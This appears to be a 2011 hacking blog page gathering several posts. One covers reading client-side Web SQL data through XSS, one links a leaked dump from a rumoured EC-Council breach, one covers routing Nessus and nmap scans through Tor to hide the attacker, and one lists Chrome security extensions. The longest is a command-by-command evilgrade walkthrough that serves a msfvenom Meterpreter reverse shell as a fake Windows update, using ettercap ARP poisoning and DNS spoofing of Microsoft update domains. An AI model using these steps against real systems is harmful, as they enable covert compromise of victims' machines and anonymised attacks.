Jul 16, 2011

HTML 5 - XSSQL attack

HTML5 brought a lot of new features to the web. One of them is the Web SQL Database API: a client-side SQLite database that a page can create and query from JavaScript through window.openDatabase. WebKit-based browsers ship it; the W3C stopped work on the specification in November 2010, but the browsers kept the implementation.
It is pretty clear that many developers will use this opportunity to store information on the client side. The risk is high if they use this repository for sensitive information such as user passwords, session IDs, credit card numbers and so on.
The database is bound to the page's origin, so any script running in that origin can read it. An XSS vulnerability in such a website therefore lets an injected script query these databases, enumerate their tables through sqlite_master without knowing the schema, and send the contents wherever it likes. The same applies to localStorage.
I even have a name for this attack: XSSQL :-) funny as well as concerning. XSS attacks remain common, and the ability to query client-side databases makes them even more powerful for stealing sensitive information. Session identifiers belong in HttpOnly cookies, which script cannot read, and nothing that would hurt if stolen belongs in client-side storage at all.
HTML 5 - SQLite Example
  <script>
  function db1()
  {
    // Web SQL (openDatabase) exists only in WebKit/Blink browsers of this era
    if (!window.openDatabase) return;

    // arguments: name, version, description, estimated size in bytes
    var db = openDatabase('yossidb', '1.0', 'attack this db', 2 * 1024 * 1024);

    // populate a table with the kind of data a careless site might keep client-side
    db.transaction(function (tx) {
      tx.executeSql('CREATE TABLE IF NOT EXISTS users (id unique, username, password)');
      tx.executeSql('INSERT INTO users (id, username, password) VALUES (1, "user1", "bbbbb")');
      tx.executeSql('INSERT INTO users (id, username, password) VALUES (2, "user2", "password")');
      tx.executeSql('INSERT INTO users (id, username, password) VALUES (3, "user3", "username")');
      tx.executeSql('INSERT INTO users (id, username, password) VALUES (4, "user4", "another")');
      tx.executeSql('INSERT INTO users (id, username, password) VALUES (5, "user5", "fighter")');
      //tx.executeSql('DROP TABLE users');
    });

    // "sql" is a text input on the page (elements with an id are reachable as
    // globals); try: SELECT * FROM users
    db.transaction(function (tx) {
      tx.executeSql(sql.value, [], function (tx, results) {
        var len = results.rows.length, i, resultsOutputUsers = "", resultsOutputPasswords = "";
        for (i = 0; i < len; i++) {
          if (results.rows.item(i).username != null) {
            resultsOutputUsers += results.rows.item(i).username + "<br/>";
            resultsOutputPasswords += results.rows.item(i).password + "<br/>";
          }
        }
        // the page has two divs, div1 and div2, that receive the result columns
        document.getElementById("div1").innerHTML = resultsOutputUsers;
        document.getElementById("div2").innerHTML = resultsOutputPasswords;
      });
    });
  }
  </script>

Source:  http://yossi-yakubov.blogspot.com/2011/07/html-5-xssql.html

If you like my blog, Please Donate Me

EC-Council was hacked again.

A couple of months ago, EC-Council was hacked with SQL injection (I'm not sure about that). Now I've heard the rumor that it was hacked again. Please see the details here.

Link: http://gaysec.net/gay/eccouncilacademy.org.txt


Jul 14, 2011

Howto: Attacking through proxies

This post shows how to run an attack tool through proxies.

 1. Attack through Tor
     1.1 Start the Privoxy and Tor services.
         $ /usr/sbin/privoxy /etc/privoxy/config
         $ /usr/bin/tor
     1.2 Create a tunnel to the Tor SOCKS port with socat. socat's SOCKS4 address has the form SOCKS4:<socks-server>:<host>:<port>, so the SOCKS server (127.0.0.1 for a local Tor) and the target host and port go between the colons; they are missing from the command as it was posted.
         $ socat TCP4-LISTEN:8080,fork SOCKS4:,socksport=9050

     Now Nessus or any other attack tool can be pointed at localhost port 8080, and socat forwards each connection through Tor to the target host and port given in the SOCKS4 address. Note that this carries TCP only, and only to that one target per listener; anything the tool sends as raw packets, ICMP or UDP leaves from your real address.

 2. Scanning through Tor with proxychains
     2.1 Configure Tor in /etc/proxychains.conf: a socks4 127.0.0.1 9050 entry in the [ProxyList] section, and proxy_dns so hostname lookups are also sent through the proxy.

     2.2 Start the Tor service
           $ /usr/bin/tor
     Now you can port scan like this: proxychains nmap -sT -Pn -n targetip.com
     Only full TCP connect() scans (-sT) go through a SOCKS proxy. SYN scans, UDP scans, OS detection and host-discovery pings use raw packets that bypass proxychains and reveal your address, hence -Pn, and -n is needed because nmap uses its own DNS resolver, whose queries proxychains does not intercept.
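The lines in /etc/proxychains.conf that this setup depends on, written out as an added example rather than the post's own file (your distribution's default file may already contain some of them; the comments are mine):

```text
# proxychains.conf: send everything through the single Tor proxy below
strict_chain

# resolve hostnames through the proxy; without this, every DNS lookup the
# proxied program makes leaves directly from your own address
proxy_dns

[ProxyList]
# Tor's default SOCKS port on the local machine
socks4  127.0.0.1 9050
```

With that file in place, proxychains nmap -sT -Pn -n targetip.com is the scan that stays inside the proxy; leaving out proxy_dns, -n or -Pn is what makes an "anonymous" scan leak.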


Chrome Extensions for Security Professional

In recent days we have seen a phenomenal increase in usage of the Google Chrome browser. Security professionals, however, still reach for Firefox in their day-to-day work, mainly because of the large set of Firefox extensions backing it up; there are also custom builds like OWASP Mantra doing the rounds.
So for those who love using Google Chrome and still miss the large plugin base, here is a list of must-have extensions for security professionals.
Note: usage can be both offensive and defensive; it is up to the user to decide. The content here is for informational purposes only.
Caution: long post. Continue below only if you have the time.
Below is the list of extensions I found useful.
The details are taken from the Chrome store; wherever I found it necessary I added my own comments.
The Web Developer toolbar of Firefox in its full glory.
Encoding/decoding plugin for various kinds of encoding, such as base64, rot13 or Unix timestamp conversion.
XSS detection and protection tools.
Request Maker is a tool for penetration testing. With it you can easily capture requests made by web pages,
tamper with the URL, headers and POST data and, of course, make new requests.
Request Maker only captures requests sent via HTML forms and XMLHttpRequests.
Edit This Cookie is a cookie manager. You can add, delete, edit, search, protect and block cookies.
A simplistic port scanner that does a simple scan of well-known ports.
Whois information displayed within the Chrome browser.
For those who don't like the Developer Tools in Chrome and want to stay with good old Firebug.
A Google Chrome extension that lets you quickly view the HTTP response headers of a URL.
See geolocation, DNS, whois, routing, search results, hosting, domain neighbors, BGP and ASN info for every IP address (IPv4 and IPv6).
A clever extension that provides a high degree of NoScript-like control over JavaScript, iframes and plugins in Google Chrome.
A nice drop-in replacement for FoxyProxy that works very well.
Note of caution: on Windows this also switches the proxy settings for IE, because Chrome uses the system proxy settings.
Session Manager lets you save sessions of your open tabs and windows, and quickly re-open them whenever you like.
Swap cookies between two accounts.
Make HTTP requests from your browser and browse the response.
Helper for web developers for creating custom HTTP requests.
Tools like ping, tracert, the W3C validator, DNS blackhole lists, DNS lookup, domain neighbors and whois information.
Displays the DNS records for the current page.
Greasemonkey drop-in replacement.
Displays the latest 5 entries from Exploit-DB.
Displays the technologies used by the website: frameworks, CMS, scripting and so on.
Perform a Websecurify scan inside your browser.
Uses the Norton SafeWeb API, but we are NOT affiliated with Symantec!
QR and other barcode images decoded in one click. Can also encode selected text or the current URL as a QR code in one click, like the others.
Supports up to 50 different services; you can expand any short URL you receive before clicking on it and following the link.
Displays the web server of the current page.
Note: this may break some pages.
This version allows you to see asterisked (password) and hidden fields.
Adds a one-click Google Safe Browsing diagnostic to your toolbar.

Source: http://blog.anantshri.info/chrome-extensions-for-security-professionals/


Jul 13, 2011

Hacking with Evilgrade on Backtrack5

           After installing evilgrade on BackTrack 5 (tutorial: how to install evilgrade on BackTrack 5), we try to use it. In this tutorial we use the new Metasploit tool msfvenom to create the shell and use it to pwn the victim. You can download this tutorial as a document, together with the ettercap-ng that I compiled myself, at the end of this post.

Attacker IP: [Backtrack 5 Gnome Desktop 64Bit]
Victim IP: [Windows XP SP2]

1. Go to the evilgrade directory and run it.
   $ cd /pentest/exploits/isr-evilgrade
   $ ./evilgrade

2. After all modules have loaded, list them with this command.
   evilgrade> show modules

3. Pick the module you want to spoof. In this tutorial I pick "winupdate", to pwn a victim machine that tries to update Windows.
   evilgrade> configure winupdate

4. Show the options of this module.
   evilgrade(winupdate)> show options

5. Set the agent that runs when the victim requests a Windows update. In this step msfvenom creates and encodes the payload; evilgrade substitutes the path between the <%OUT%> markers for the file it serves.
   evilgrade(winupdate)> set agent '["/pentest/exploits/framework3/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST= LPORT=445 -f exe  1> <%OUT%>/tmp/windowsupdate.exe<%OUT%>"]'

6. Make sure no DNS service is already listening on port 53 on this host (evilgrade runs its own DNS server) and that the LPORT chosen in step 5 is not in use.

7. Start the evilgrade server.
   evilgrade(winupdate)> start

8. Edit /usr/share/ettercap/etter.dns with any text editor and add spoofed DNS entries pointing "windowsupdate.microsoft.com", "update.microsoft.com", "www.microsoft.com" and "go.microsoft.com" at the attacker machine, as in this picture.

9. Run ettercap with the -G option for the GUI.
   $ ettercap -G

10. Go to Sniff -> Unified Sniffing

11. Choose the interface you want to sniff on.

12. Enable the DNS spoofing plugin: go to Plugins -> Manage the Plugins -> double-click "dns_spoof"

13. Scan for machines on the same network: go to Hosts -> Scan for hosts

14. View the hosts on the network and set the targets: go to Hosts -> Hosts list -> click the gateway IP and [Add to Target 1] -> click the victim IP and [Add to Target 2]

15. Start the attack: go to Mitm -> Arp poisoning -> tick "Sniff remote connections"

16. Start sniffing: go to Start -> Start Sniffing

*** If you get the message "Dissector "dns" not supported" from ettercap, fix it with this tutorial:
  1. Get the source from http://ettercap.sourceforge.net 
  2. Extract it with tar xzvf ettercap-ng-0.7.3.tar.gz

  3. Edit the configure script so the DNS dissector is built:
      -  in line 29472: ac_cv_search_dn_expand="-lresolv"
      -  in line 29669: if true; then
      -  in line 29676: ac_ec_dns=yes

  4. Edit the src/ec_log.c file (the flags are O_CREAT etc. with the letter O, not the digit 0):
      -  in line 193: fd->fd = open(filename, O_CREAT | O_TRUNC | O_RDWR | O_BINARY, 0666);
  5. Save and exit

  6. Compile and install it with ./configure && make && make install
  7. Because this build installs under /usr/local, change the DNS records in /usr/local/share/ettercap/etter.dns instead of /usr/share/ettercap/etter.dns

Source: http://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwebcache.googleusercontent.com%2Fsearch%3Fq%3Dcache%3AONv78qOlYGkJ%3Aunknowndebian.free.fr%2Fwordpress%2F%3Fp%3D20%2520http%3A%2F%2Funknowndebian.free.fr%2Fwordpress%2F%3Fp%3D20

17. Use Metasploit's msfcli to start the handler that waits for the connection back from the victim machine (msfcli expects the execution mode, E, as its last argument).
      $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=445 LHOST=

18. On the victim machine, try to update Windows. The request for windowsupdate.microsoft.com is redirected to the attacker machine, and the victim is prompted to download the update file.


19. When the victim runs the update file, we get the Meterpreter session.
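The etter.dns entries for step 8, written out as an added example rather than the post's screenshot. 10.0.0.1 is a placeholder for the attacker's BackTrack machine, which the post leaves blank; ettercap's record format is hostname, record type, address, one entry per line:

```text
# /usr/share/ettercap/etter.dns (or /usr/local/share/ettercap/etter.dns for the
# self-compiled build from the fix above). Format: <hostname> <type> <address>
# 10.0.0.1 is a placeholder for the attacker machine running evilgrade.
windowsupdate.microsoft.com  A  10.0.0.1
update.microsoft.com         A  10.0.0.1
www.microsoft.com            A  10.0.0.1
go.microsoft.com             A  10.0.0.1
```

Only queries for these exact names are answered with the attacker's address; dns_spoof passes every other lookup through unchanged, so the victim keeps working normally until it asks for Windows Update, which is what makes the redirection hard to notice.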